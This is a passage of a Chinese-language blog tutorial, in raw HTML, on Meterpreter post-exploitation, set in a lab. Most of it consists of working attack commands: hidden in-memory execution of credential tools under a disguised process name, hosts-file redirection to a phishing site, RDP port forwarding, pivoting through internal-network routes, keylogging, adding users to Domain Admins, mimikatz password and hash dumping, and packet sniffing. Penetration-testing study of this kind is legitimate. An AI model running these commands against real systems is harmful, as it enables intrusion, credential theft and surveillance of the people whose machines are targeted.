alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(5)\u201csysinfo\u201d\u547d\u4ee4<\/p>\n\n\n\n<p>\u201csysinfo\u201d\u547d\u4ee4\u4e3a\u663e\u793a\u8fdc\u7a0b\u4e3b\u673a\u7684\u7cfb\u7edf\u4fe1\u606f\uff0c\u663e\u793a\u8ba1\u7b97\u673a\u3001\u7cfb\u7edf\u4fe1\u606f\u3001\u7ed3\u6784\u3001\u8bed\u8a00\u7b49\u4fe1\u606f\u3002\u53ef\u4ee5\u770b\u5230\u8fdc\u7a0b\u4e3b\u673a\u7684\u64cd\u4f5c\u7cfb\u7edf\u662fwindows XP service pack 2\uff0csp2\u8fd9\u4e2a\u7cfb\u7edf\u6709\u5f88\u591a\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/205806772.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025502895-1475428553.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(6)execute\u547d\u4ee4<\/p>\n\n\n\n<p>\u201cexecute\u201d\u547d\u4ee4\u4e3a\u76ee\u6807\u4e3b\u673a\u4e0a\u6267\u884c\u4e00\u4e2a\u547d\u4ee4\uff0c\u5176\u4e2d\u201cexecute -h\u201d\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\u3002-f\u4e3a\u6267\u884c\u8981\u8fd0\u884c\u7684\u547d\u4ee4,<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210000715.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025503555-946336430.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u8fd0\u884c\u67d0\u4e2a\u7a0b\u5e8f,\u4f8b\u5982\u6211\u4eec\u76ee\u524d\u6ce8\u5165\u8fdb\u7a0b\u5230explorer.exe\u540e\uff0c\u8fd0\u884c\u7528\u6237\u4e3a\u8d85\u7ea7\u7ba1\u7406administrator<\/p>\n\n\n\n<p>\u6211\u4eec\u8fd0\u884c\u4e00\u4e0b\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u8bb0\u4e8b\u672c\u7a0b\u5e8f<\/p>\n\n\n\n<p>execute&nbsp; -f&nbsp;notepad.exe<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025503797-1918223584.gif\" alt=\"\" width=\"534\" height=\"39\"><br>\u76ee\u6807\u4e3b\u673a\u4e0a\u7acb\u9a6c\u5f39\u51fa\u6765\u4e00\u4e2a\u8bb0\u4e8b\u672c\u7a0b\u5e8f\uff0c\u5982\u4e0b\u56fe\uff1a<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025504353-765597276.gif\" alt=\"\" width=\"554\" height=\"304\"><br>\u8fd9\u6837\u592a\u660e\u663e\uff0c\u5982\u679c\u5e0c\u671b\u9690\u85cf\u540e\u53f0\u6267\u884c\uff0c\u52a0\u53c2\u6570-H<\/p>\n\n\n\n<p>execute&nbsp; -H -f&nbsp;notepad.exe<\/p>\n\n\n\n<p>\u6b64\u65f6\u76ee\u6807\u4e3b\u673a\u684c\u9762\u6ca1\u53cd\u5e94\uff0c\u4f46\u6211\u4eec\u5728meterpreter\u4f1a\u8bdd\u4e0a\u4f7f\u7528ps\u547d\u4ee4\u770b\u5230\u4e86<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025504919-349237318.gif\" alt=\"\" width=\"554\" height=\"167\"><br>\u518d\u770b\u4e00\u4e2a\uff0c\u6211\u4eec\u8fd0\u884c\u76ee\u6807\u4e3b\u673a\u4e0a\u7684cmd.exe\u7a0b\u5e8f\uff0c\u5e76\u4ee5\u9690\u85cf\u7684\u65b9\u5f0f\u76f4\u63a5\u4ea4\u4e92\u5230\u6211\u4eec\u7684meterpreter\u4f1a\u8bdd\u4e0a<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1a<\/p>\n\n\n\n<p>execute&nbsp; -H -i -f&nbsp;cmd.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025505245-493104547.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u8fd9\u8fbe\u5230\u7684\u6548\u679c\u5c31\u8ddf\u4f7f\u7528shell\u547d\u4ee4\u4e00\u6837\u4e86<\/p>\n\n\n\n<p>\u518d\u6765\u4e00\u4e2a\uff0c\u5728\u76ee\u6807\u4e3b\u673a\u5185\u5b58\u4e2d\u76f4\u63a5\u6267\u884c\u6211\u4eec\u653b\u51fb\u4e3b\u673a\u4e0a\u7684\u653b\u51fb\u7a0b\u5e8f\uff0c\u6bd4\u5982wce.exe\uff0c\u53c8\u6bd4\u5982\u6728\u9a6c\u7b49\uff0c\u8fd9\u6837\u53ef\u4ee5\u907f\u514d\u653b\u51fb\u7a0b\u5e8f\u5b58\u50a8\u5230\u76ee\u6807\u4e3b\u673a\u786c\u76d8\u4e0a\u88ab\u53d1\u73b0\u6216\u88ab\u67e5\u6740\u3002<\/p>\n\n\n\n<p>execute&nbsp; -H -m -d notepad.exe-f&nbsp; wce.exe -a &#8220;-o&nbsp;wce.txt&#8221;<\/p>\n\n\n\n<p>-d&nbsp;\u5728\u76ee\u6807\u4e3b\u673a\u6267\u884c\u65f6\u663e\u793a\u7684\u8fdb\u7a0b\u540d\u79f0\uff08\u7528\u4ee5\u4f2a\u88c5\uff09<\/p>\n\n\n\n<p>-m&nbsp;\u76f4\u63a5\u4ece\u5185\u5b58\u4e2d\u6267\u884c<\/p>\n\n\n\n<p>&nbsp;&#8220;-o&nbsp;wce.txt&#8221;\u662fwce.exe\u7684\u8fd0\u884c\u53c2\u6570<\/p>\n\n\n\n<p>(7)idletime\u547d\u4ee4<\/p>\n\n\n\n<p>\u201cidletime\u201d\u547d\u4ee4\u4e3a\u663e\u793a\u76ee\u6807\u673a\u5668\u622a\u6b62\u5230\u5f53\u524d\u65e0\u64cd\u4f5c\u547d\u4ee4\u7684\u65f6\u95f4\u3002\u56fe\u4e2d\u7684\u663e\u793a\u610f\u601d\u4e3a\u76ee\u6807\u4e3b\u673a\u6709\u64cd\u4f5c\u662f\u57289\u520619\u79d2\u4e4b\u524d\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/blog.51cto.com\/attachment\/201301\/210030397.jpg\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025505524-765838553.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p>(8)search\u547d\u4ee4<\/p>\n\n\n\n<p>\u201csearch\u201c\u547d\u4ee4\u5728\u76ee\u6807\u4e3b\u673a\u641c\u7d22\u7279\u5b9a\u7684\u6587\u4ef6\u3002\u8be5\u547d\u4ee4\u80fd\u591f\u901a\u8fc7\u641c\u7d22\u6574\u4e2a\u7cfb\u7edf\u6216\u7279\u5b9a\u7684\u6587\u4ef6\u5939\u3002<\/p>\n\n\n\n<p>\u4f7f\u7528\u201csearch \u2013h\u201d\u547d\u4ee4\u6765\u67e5\u770bsearch\u547d\u4ee4\u7684\u5e2e\u52a9\u4fe1\u606f\uff1a<\/p>\n\n\n\n<p>\u4e0b\u56fe\u4e2d\uff0c\u201csearch \u2013f aa.txt\u201d\u547d\u4ee4\u4e3a\u67e5\u770b\u76ee\u6807\u673a\u4e2d\u5728\u5f53\u524d\u76ee\u5f55\u4ee5\u53ca\u5f53\u524d\u76ee\u5f55\u7684\u5b50\u76ee\u5f55\u4e2d\u6709\u6ca1\u6709aa.txt\u8fd9\u4e2a\u6587\u4ef6\uff0c\u82e5\u6709\u5219\u663e\u793a\u51fa\u5176\u8def\u5f84\u3002<\/p>\n\n\n\n<p>\u201csearch \u2013f l*.txt c:\\\\pp\u201d\u4e3a\u663e\u793a\u51fac:\\\\pp\u4e0b\u53capp\u6587\u4ef6\u5939\u4e0b\u6240\u6709\u7684\u5b50\u6587\u4ef6\u4e0b\u6240\u6709\u4ee5l\u5f00\u5934\u7684txt\u6587\u4ef6\uff0c\u82e5\u6709\u6b64\u7c7b\u6587\u4ef6\uff0c\u5219\u8fd4\u56de\u5176\u8def\u5f84\u548c\u5176\u5927\u5c0f\u3002<\/p>\n\n\n\n<p>(9)edit\u547d\u4ee4<\/p>\n\n\n\n<p>\u8c03\u7528vi\u7f16\u8f91\u5668\uff0c\u5bf9\u76ee\u6807\u4e3b\u673a\u4e0a\u7684\u6587\u4ef6\u4fee\u6539<\/p>\n\n\n\n<p>\u4f8b\u5982\u4fee\u6539\u76ee\u6807\u4e3b\u673a\u4e0a\u7684hosts\u6587\u4ef6\uff0c\u4f7f\u5f97\u76ee\u6807\u4e3b\u673a\u8bbf\u95eebaidu\u65f6\u53bb\u5230\u51c6\u5907\u597d\u7684\u9493\u9c7c\u7f51\u7ad9\uff08\u4ec5\u9650\u5b9e\u9a8c\u7528\u9014\uff09<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025505961-25073432.gif\" alt=\"\" width=\"647\" height=\"119\"><br>\u5728\u76ee\u6807\u4e3b\u673a\u4e0aping www.baidu.com\uff0c\u51fa\u6765\u7684\u76ee\u6807IP\u5c31\u662f\u6211\u4eec\u4fee\u6539\u7684192.168.1.1\u4e86<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025506153-1782302168.gif\" alt=\"\" width=\"526\" height=\"53\"><\/p>\n\n\n\n<p>3.\u7f51\u7edc\u547d\u4ee4<\/p>\n\n\n\n<p>ipconfig\/ifconfig#\u663e\u793a\u7f51\u7edc\u63a5\u53e3\u7684\u5173\u952e\u4fe1\u606f\uff0c\u5305\u62ec&nbsp;IP&nbsp;\u5730\u5740<\/p>\n\n\n\n<p>portfwd -h<\/p>\n\n\n\n<p>\u7528\u6cd5\uff1aportfwd&nbsp;[-h]&nbsp;[add&nbsp;|&nbsp;delete&nbsp;|&nbsp;list&nbsp;|&nbsp;flush]&nbsp;[args]<\/p>\n\n\n\n<p>\u9009\u9879\uff1a<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -L &lt;opt&gt;\u8981\u76d1\u542c\u7684\u672c\u5730\u4e3b\u673a\uff08\u53ef\u9009\uff09<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -h\u5e2e\u52a9\u6a2a\u5e45<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -l &lt;opt&gt;\u8981\u76d1\u542c\u7684\u672c\u5730\u7aef\u53e3<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -p &lt;opt&gt;\u8fde\u63a5\u5230\u7684\u8fdc\u7a0b\u7aef\u53e3<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; -r &lt;opt&gt;\u8981\u8fde\u63a5\u5230\u7684\u8fdc\u7a0b\u4e3b\u673a<\/p>\n\n\n\n<p>portfwd&nbsp; add -l 4444 -p 3389 -r 192.168.1.102 # \u7aef\u53e3\u8f6c\u53d1,\u672c\u673a\u76d1\u542c4444,\u628a\u76ee\u6807\u673a3389\u8f6c\u5230\u672c\u673a4444<\/p>\n\n\n\n<p>netstat -an | grep\u201c4444&#8243;&nbsp; #\u67e5\u770b\u6307\u5b9a\u7aef\u53e3\u5f00\u653e\u60c5\u51b5<\/p>\n\n\n\n<p>rdesktop -u Administrator -p bk#123 127.0.0.1:4444 #\u4f7f\u7528rdesktop\u6765\u8fde\u63a5\u684c\u9762\uff0c-u \u7528\u6237\u540d&nbsp;-p&nbsp;\u5bc6\u7801<\/p>\n\n\n\n<p>rdesktop 127.1.1.0:4444 #\u9700\u8981\u8f93\u5165\u7528\u6237\u540d\u548c\u5bc6\u7801\u8fdc\u7a0b\u8fde\u63a5<\/p>\n\n\n\n<p>route#\u67e5\u770b\u6216\u4fee\u6539\u53d7\u5bb3\u8005\u8def\u7531\u8868<\/p>\n\n\n\n<p>route add 192.168.1.0 255.255.255.0 1 #\u6dfb\u52a0\u52a8\u6001\u8def\u7531<\/p>\n\n\n\n<p>route print #\u8def\u7531\u8868\u8f93\u51fa<\/p>\n\n\n\n<p>runget_local_subnets #\u76ee\u6807\u4e3b\u673a\u7684\u5185\u7f51IP\u6bb5\u60c5\u51b5<\/p>\n\n\n\n<p>Arp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #\u770bARP\u7f13\u51b2\u8868<\/p>\n\n\n\n<p>Getproxy&nbsp;&nbsp;&nbsp;&nbsp; #\u83b7\u53d6\u4ee3\u7406<\/p>\n\n\n\n<p>\uff081\uff09portfwd<\/p>\n\n\n\n<p>\u7f51\u7edc\u547d\u4ee4\u5219\u6709\u5217\u51faip\u4fe1\u606f(ipconfig),\u5c55\u793a\u4fee\u6539\u8def\u7531\u8868(route),\u8fd8\u6709\u7aef\u53e3\u8f6c\u53d1(portfwd)\u3002 \u6bd4\u5982portfwd\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025506778-1694584941.gif\" alt=\"enter image description here\"\/><\/figure>\n\n\n\n<p>\u5728\u5efa\u7acb\u89c4\u5219\u4e4b\u540e\u5c31\u53ef\u4ee5\u8fde\u63a5\u672c\u57303344\u7aef\u53e3\uff0c\u8fd9\u6837\u8fdc\u7a0b\u76843389\u7aef\u53e3\u5c31\u8f6c\u53d1\u51fa\u6765\u4e86\u3002<\/p>\n\n\n\n<p>(2)route<\/p>\n\n\n\n<p>\u4f7f\u7528route\u547d\u4ee4\u53ef\u4ee5\u501f\u52a9meterpreter\u4f1a\u8bdd\u8fdb\u4e00\u6b65msf\u6e17\u900f\u5185\u7f51\uff0c\u6211\u4eec\u5df2\u7ecf\u62ff\u4e0b\u5e76\u4ea7\u751fmeterpreter\u53cd\u5f39\u4f1a\u8bdd\u7684\u4e3b\u673a\u53ef\u80fd\u51fa\u4e8e\u5185\u7f51\u4e4b\u4e2d\uff0c\u5916\u6709\u4e00\u5c42NAT\uff0c\u6211\u4eec\u65e0\u6cd5\u76f4\u63a5\u5411\u5176\u5185\u7f51\u4e2d\u5176\u4ed6\u4e3b\u673a\u53d1\u8d77\u653b\u51fb\uff0c\u5219\u53ef\u4ee5\u501f\u52a9\u5df2\u4ea7\u751f\u7684meterpreter\u4f1a\u8bdd\u4f5c\u4e3a\u8def\u7531\u8df3\u677f\uff0c\u653b\u51fb\u5185\u7f51\u5176\u5b83\u4e3b\u673a\u3002<\/p>\n\n\n\n<p>\u53ef\u4ee5\u5148\u4f7f\u7528run&nbsp;get_local_subnets\u547d\u4ee4\u67e5\u770b\u5df2\u62ff\u4e0b\u7684\u76ee\u6807\u4e3b\u673a\u7684\u5185\u7f51IP\u6bb5\u60c5\u51b5<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1arun&nbsp; get_local_subnets<\/p>\n\n\n\n<p>\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025507058-643543622.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5176\u5185\u7f51\u6709192.168.249.0\/24\u7f51\u6bb5\uff0c\u6211\u4eec\u65e0\u6cd5\u76f4\u63a5\u8bbf\u95ee<\/p>\n\n\n\n<p>\u4e0b\u9762\u505a\u4e00\u6761\u8def\u7531\uff0c\u4e0b\u4e00\u8df3\u4e3a\u5f53\u524d\u62ff\u4e0b\u4e3b\u673a\u7684sessionid\uff08\u76ee\u524d\u4e3a5\uff09\uff0c\u5373\u6240\u6709\u5bf9249\u7f51\u6bb5\u7684\u653b\u51fb\u6d41\u91cf\u90fd\u901a\u8fc7\u5df2\u6e17\u900f\u7684\u8fd9\u53f0\u76ee\u6807\u4e3b\u673a\u7684meterpreter\u4f1a\u8bdd\u6765\u4f20\u9012\u3002<\/p>\n\n\n\n<p>\u547d\u4ee4\uff1aroute add&nbsp; 192.168.249.0 255.255.255.0 5<\/p>\n\n\n\n<p>\u518d\u4f7f\u7528route print\u67e5\u770b\u4e00\u4e0b\u8def\u7531\u8868\uff0c\u6548\u679c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025507697-727487729.gif\" alt=\"\" width=\"638\" height=\"189\"><br>\u6700\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u901a\u8fc7\u8fd9\u6761\u8def\u7531\uff0c\u4ee5\u5f53\u524d\u62ff\u4e0b\u7684\u4e3b\u673ameterpreter\u4f5c\u4e3a\u8def\u7531\u8df3\u677f\u653b\u51fb249\u7f51\u6bb5\u4e2d\u53e6\u4e00\u53f0\u6709ms08-067\u6f0f\u6d1e\u7684\u4e3b\u673a\uff0c\u83b7\u5f97\u53cd\u5f39\u4f1a\u8bdd\u6210\u529f\u987a\u5229\u62ff\u4e0b\u4e86\u53e6\u4e00\u53f0\u5185\u7f51\u4e3b\u673a192.168.249.1\uff0c\u5982\u4e0b\u56fe\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025508705-1158483190.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u5927\u591a\u65f6\u5019\u6211\u4eec\u83b7\u53d6\u5230\u7684meterpreter shell\u5904\u4e8e\u5185\u7f51\uff0c\u800c\u6211\u4eec\u9700\u8981\u4ee3\u7406\u5230\u76ee\u6807\u5185\u7f51\u73af\u5883\u4e2d\uff0c\u626b\u63cf\u5176\u5185\u7f51\u670d\u52a1\u5668\u3002\u8fd9\u65f6\u53ef\u4ee5\u4f7f\u7528route\u529f\u80fd\uff0c\u6dfb\u52a0\u4e00\u6761\u901a\u5411\u76ee\u6807\u670d\u52a1\u5668\u5185\u7f51\u7684\u8def\u7531\u3002<\/p>\n\n\n\n<p>\u67e5\u770bshell\u7f51\u7edc\u73af\u5883\uff1a<\/p>\n\n\n\n<p>meterpreter&gt;run get_local_subnets<\/p>\n\n\n\n<p>\u6dfb\u52a0\u4e00\u6761\u901a\u5411\u76ee\u6807\u670d\u52a1\u5668\u5185\u7f51\u7684\u8def\u7531<\/p>\n\n\n\n<p>meterpreter&gt;run&nbsp;autoroute&nbsp;-s&nbsp;100.0.0.0\/8 &nbsp;&nbsp;#(\u6839\u636e\u76ee\u6807\u5185\u7f51\u7f51\u7edc\u800c\u5b9a)<\/p>\n\n\n\n<p>\u67e5\u770b\u8def\u7531\u8bbe\u7f6e\uff1a<\/p>\n\n\n\n<p>meterpreter&gt;run autoroute \u2013p<\/p>\n\n\n\n<p>\u4e00\u822c\u6765\u8bf4\uff0c\u5728meterpreter\u4e2d\u8bbe\u7f6e\u8def\u7531\u4fbf\u53ef\u4ee5\u8fbe\u5230\u901a\u5f80\u5176\u5185\u7f51\u7684\u76ee\u7684\u3002\u7136\u800c\u6709\u4e9b\u65f6\u5019\u8fd8\u662f\u4f1a\u5931\u8d25\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5background\u8fd4\u56demsf&gt;\uff0c\u67e5\u770b\u4e0b\u5916\u9762\u7684\u8def\u7531\u60c5\u51b5\u3002<\/p>\n\n\n\n<p>route print<\/p>\n\n\n\n<p>\u5982\u679c\u53d1\u73b0\u6ca1\u6709\u8def\u7531\u4fe1\u606f\uff0c\u8bf4\u660emeterpreter shell\u8bbe\u7f6e\u7684\u8def\u7531\u5e76\u6ca1\u6709\u751f\u6548\uff0c\u6211\u4eec\u53ef\u4ee5\u5728msf\u4e2d\u6dfb\u52a0\u8def\u7531\u3002<\/p>\n\n\n\n<p>msf&gt;route add 10.0.0.0 255.0.0.0 1<\/p>\n\n\n\n<p>\u8bf4\u660e\uff1a1\u8868\u793asession 1\uff0c\u653b\u51fb\u673a\u5982\u679c\u8981\u53bb\u8bbf\u95ee10.0.0.0\/8\u7f51\u6bb5\u7684\u8d44\u6e90\uff0c\u5176\u4e0b\u4e00\u8df3\u662fsession1\uff0c\u81f3\u4e8e\u4ec0\u4e48\u662f\u4e0b\u4e00\u6761\u8fd9\u91cc\u4e0d\u591a\u8bf4\u4e86\uff0c\u53cd\u6b63\u5c31\u662f\u76ee\u524d\u653b\u51fb\u673a\u53ef\u4ee5\u8bbf\u95ee\u5185\u7f51\u8d44\u6e90\u4e86\u3002<\/p>\n\n\n\n<p>4.\u952e\u76d8\u76d1\u542c<\/p>\n\n\n\n<p>Meterpreter\u8fd8\u53ef\u4ee5\u5728\u76ee\u6807\u8bbe\u5907\u4e0a\u5b9e\u73b0\u952e\u76d8\u8bb0\u5f55\u529f\u80fd\uff0c\u952e\u76d8\u8bb0\u5f55\u4e3b\u8981\u6d89\u53ca\u4ee5\u4e0b\u4e09\u79cd\u547d\u4ee4\uff1a<\/p>\n\n\n\n<p>keyscan_start\uff1a\u5f00\u542f\u952e\u76d8\u8bb0\u5f55\u529f\u80fd<\/p>\n\n\n\n<p>keyscan_dump\uff1a\u663e\u793a\u6355\u6349\u5230\u7684\u952e\u76d8\u8bb0\u5f55\u4fe1\u606f<\/p>\n\n\n\n<p>keyscan_stop\uff1a\u505c\u6b62\u952e\u76d8\u8bb0\u5f55\u529f\u80fd<\/p>\n\n\n\n<p>uictl enable keyboard\/mouse#\u63a5\u7ba1\u76ee\u6807\u4e3b\u673a\u7684\u952e\u76d8\u548c\u9f20\u6807\u3002<\/p>\n\n\n\n<p>meterpreter &gt; keyscan_start #\u9488\u5bf9\u8fdc\u7a0b\u76ee\u6807\u4e3b\u673a\u5f00\u542f\u952e\u76d8\u8bb0\u5f55\u529f\u80fd<\/p>\n\n\n\n<p>Starting the keystroke sniffer&#8230;<\/p>\n\n\n\n<p>meterpreter &gt; keyscan_dump #\u5b58\u50a8\u76ee\u6807\u4e3b\u673a\u4e0a\u6355\u83b7\u7684\u952e\u76d8\u8bb0\u5f55<\/p>\n\n\n\n<p>Dumping captured keystrokes&#8230;<\/p>\n\n\n\n<p>dir &lt;Return&gt; cd&lt;Ctrl&gt;&nbsp; &lt;LCtrl&gt;<\/p>\n\n\n\n<p>meterpreter &gt; keyscan_stop #\u505c\u6b62\u9488\u5bf9\u76ee\u6807\u4e3b\u673a\u7684\u952e\u76d8\u8bb0\u5f55<\/p>\n\n\n\n<p>Stopping the keystroke sniffer&#8230;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025509266-2015215398.gif\" alt=\"enter image description here\"\/><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\u4e00\u4e0bwindows\u4f1a\u8bdd\u7a97\u53e3\u7684\u6982\u5ff5\uff0cwindows\u684c\u9762\u5212\u5206\u4e3a\u4e0d\u540c\u7684\u4f1a\u8bdd(session)\uff0c\u4ee5\u4fbf\u4e8e\u4e0ewindows\u4ea4\u4e92\u3002\u4f1a\u8bdd0\u4ee3\u8868\u63a7\u5236\u53f0\uff0c1\uff0c2\u4ee3\u8868\u8fdc\u7a0b\u684c\u9762\u3002\u6240\u4ee5\u8981\u622a\u83b7\u952e\u76d8\u8f93\u5165\u5fc5\u987b\u57280\u4e2d\u8fdb\u884c\u3002\u53ef\u4ee5\u4f7f\u7528getdesktop\u67e5\u770b\u6216\u8005\u622a\u5f20\u56fe\u8bd5\u8bd5\u3002\u5426\u5219\u4f7f\u7528setdesktop\u5207\u6362\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025509918-1993120500.gif\" alt=\"enter image description here\"\/><\/figure>\n\n\n\n<p>\u5982\u679c\u4e0d\u884c\u5c31\u5207\u6362\u5230explorer.exe\u8fdb\u7a0b\u4e2d\uff0c\u8fd9\u6837\u4e5f\u53ef\u4ee5\u76d1\u542c\u5230\u8fdc\u7a0b\u684c\u9762\u8fde\u63a5\u8fdb\u6765\u4e4b\u540e\u7684\u952e\u76d8\u8f93\u5165\u6570\u636e\u3002<\/p>\n\n\n\n<p>5.\u7cfb\u7edf\u547d\u4ee4<\/p>\n\n\n\n<p>reboot#\u91cd\u65b0\u542f\u52a8\u53d7\u5bb3\u4eba\u7684\u8ba1\u7b97\u673a<\/p>\n\n\n\n<p>reg#\u4e0e\u53d7\u5bb3\u4eba\u7684\u6ce8\u518c\u8868\u8fdb\u884c\u4ea4\u4e92<\/p>\n\n\n\n<p>rev2self#\u56de\u5230\u63a7\u5236\u76ee\u6807\u4e3b\u673a\u7684\u521d\u59cb\u7528\u6237\u8d26\u6237\u4e0b<\/p>\n\n\n\n<p>shell#\u83b7\u5f97\u63a7\u5236\u53f0\u6743\u9650<\/p>\n\n\n\n<p>shutdown#\u5173\u95ed\u4e86\u53d7\u5bb3\u8005\u7684\u8ba1\u7b97\u673a<\/p>\n\n\n\n<p>sysinfo # \u67e5\u770b\u76ee\u6807\u673a\u7cfb\u7edf\u4fe1\u606f\uff0c\u5982\u673a\u5668\u540d\uff0c\u64cd\u4f5c\u7cfb\u7edf\u7b49<\/p>\n\n\n\n<p>add_user username password -h ip&nbsp;&nbsp;&nbsp; #\u5728\u8fdc\u7a0b\u76ee\u6807\u4e3b\u673a\u4e0a\u6dfb\u52a0\u4e00\u4e2a\u7528\u6237<\/p>\n\n\n\n<p>add_group_user &#8220;Domain Admins&#8221; username -h ip&nbsp;&nbsp;&nbsp; #\u5c06\u7528\u6237\u6dfb\u52a0\u5230\u76ee\u6807\u4e3b\u673a\u7684\u57df\u7ba1\u7406\u5458\u7ec4\u4e2d<\/p>\n\n\n\n<p>shell\u547d\u4ee4<\/p>\n\n\n\n<p>\u83b7\u53d6\u76ee\u6807\u4e3b\u673a\u7684\u8fdc\u7a0b\u547d\u4ee4\u884cshell,\u5982\u679c\u51fa\u9519\uff0c\u8003\u8651\u662f\u76ee\u6807\u4e3b\u673a\u9650\u5236\u4e86cmd.exe\u7684\u8bbf\u95ee\u6743\uff0c\u53ef\u4ee5\u4f7f\u7528migrate\u6ce8\u5165\u5230\u7ba1\u7406\u5458\u7528\u6237\u8fdb\u7a0b\u4e2d\u518d\u5c1d\u8bd5<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025510277-994919012.gif\" alt=\"\"\/><\/figure>\n\n\n\n<p>6.mimikatz<\/p>\n\n\n\n<p>meterpreter &gt; load mimikatz&nbsp; #\u52a0\u8f7dmimikatz<\/p>\n\n\n\n<p>meterpreter &gt; msv #\u83b7\u53d6hash\u503c<\/p>\n\n\n\n<p>meterpreter &gt; kerberos #\u83b7\u53d6\u660e\u6587<\/p>\n\n\n\n<p>meterpreter &gt;ssp &nbsp;&nbsp;#\u83b7\u53d6\u660e\u6587\u4fe1\u606f<\/p>\n\n\n\n<p>meterpreter &gt; wdigest #\u83b7\u53d6\u7cfb\u7edf\u8d26\u6237\u4fe1\u606f<\/p>\n\n\n\n<p>meterpreter &gt;mimikatz_command -f a:: &nbsp;&nbsp;#\u5fc5\u987b\u8981\u4ee5\u9519\u8bef\u7684\u6a21\u5757\u6765\u8ba9\u6b63\u786e\u7684\u6a21\u5757\u663e\u793a<\/p>\n\n\n\n<p>meterpreter &gt;mimikatz_command -f hash:: &nbsp;&nbsp;#\u83b7\u53d6\u76ee\u6807&nbsp;hash<\/p>\n\n\n\n<p>meterpreter &gt; mimikatz_command -f samdump::hashes<\/p>\n\n\n\n<p>meterpreter &gt; mimikatz_command -f sekurlsa::searchPasswords<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/images2018.cnblogs.com\/blog\/1049983\/201808\/1049983-20180816025511190-1101646215.gif\" alt=\"\u8fd9\u91cc\u5199\u56fe\u7247\u63cf\u8ff0\"\/><\/figure>\n\n\n\n<p>7.\u7f51\u7edc\u55c5\u63a2<\/p>\n\n\n\n<p>meterpreter &gt; use sniffer # \u52a0\u8f7d\u55c5\u63a2\u6a21\u5757<\/p>\n\n\n\n<p>Loading extension sniffer&#8230;success.<\/p>\n\n\n\n<p>meterpreter &gt; sniffer_interfaces #\u5217\u51fa\u76ee\u6807\u4e3b\u673a\u6240\u6709\u5f00\u653e\u7684\u7f51\u7edc\u63a5\u53e3<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; 1 &#8211; &#8216;WAN Miniport (Network Monitor)&#8217; ( type:3 mtu:1514 usable:true dhcp:false wifi:false )<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp; 2 &#8211; &#8216;Intel(R) PRO\/1000 MT Desktop Adapter&#8217; ( type:0 mtu:1514 usable:true dhcp:true wifi:false 